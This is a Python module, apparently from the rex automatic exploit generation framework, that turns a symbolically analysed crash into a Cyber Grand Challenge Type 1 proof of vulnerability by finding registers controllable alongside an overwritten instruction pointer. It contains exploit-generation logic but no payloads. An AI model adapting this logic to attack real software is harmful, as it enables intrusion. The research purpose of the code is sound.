import logging
import claripy
from rex import Vulnerability
from rex.exploit import CannotExploit
from rex.exploit.cgc import CGCType1CircumstantialExploit
from ..technique import Technique

l = logging.getLogger("rex.exploit.techniques.circumstantial_set_register")


class CircumstantialSetRegister(Technique):

    name = "circumstantially_set_register"
    applicable_to = ['cgc']
    cgc_registers = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
    bitmask_threshold = 20
    # this technique should create an exploit which is a type1 pov
    pov_type = 1
    generates_pov = True

    def __init__(self, crash, rop, shellcode):
        super(CircumstantialSetRegister, self).__init__(crash, rop, shellcode)
        self._ip_bitmask = None
        self._ip_bitcnt = None

    def set_register(self, register):
        """
        :param register
        set a register with shellcode on cgc
        """

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            raise CannotExploit("[%s] cannot control ip" % self.name)

        state = self.crash.state

        if self._ip_bitcnt < CircumstantialSetRegister.bitmask_threshold:
            raise CannotExploit("not enough controlled bits of ip")

        # see if the register value is nearly unconstrained
        reg = getattr(state.regs, register)

        # we need to make sure that the pc and this register don't conflict
        conflict = not state.satisfiable(extra_constraints=(reg != state.regs.pc,))
        if conflict:
            raise CannotExploit("register %s conflicts with pc, pc and register must be equal" % register)

        # get the register's bitmask
        reg_bitmask, reg_bitcnt = self.get_bitmask_for_var(state, reg)

        if reg_bitcnt >= CircumstantialSetRegister.bitmask_threshold:
            if not any([v.startswith('aeg_input') for v in reg.variables]):
                raise CannotExploit("register %s was symbolic but was not tainted by user input" % register)

            l.info("can circumstantially set register %s", register)

            ccp = self.crash.copy()

            value_var = claripy.BVS('value_var', 32, explicit_name=True)
            ip_var = claripy.BVS('ip_var', 32, explicit_name=True)

            reg = getattr(ccp.state.regs, register)
            ccp.state.add_constraints(reg == value_var)
            ccp.state.add_constraints(ccp.state.regs.ip == ip_var)

            mem = [reg] + [ccp.state.regs.ip]

            return CGCType1CircumstantialExploit(ccp, register, reg_bitmask,
                    self._ip_bitmask, mem, value_var, ip_var)
        else:
            raise CannotExploit("register %s's value does not appear to be unconstrained" % register)

    def apply(self, **kwargs):

        ip = self.crash.state.regs.ip
        self._ip_bitmask, self._ip_bitcnt = self.get_bitmask_for_var(self.crash.state, ip)

        for register in CircumstantialSetRegister.cgc_registers:
            try:
                reg_setter = self.set_register(register)
                l.info("was able to set register [%s] circumstantially", register)
                return reg_setter
            except CannotExploit as e:
                l.debug("could not set register %s circumstantially (%s)", register, e)
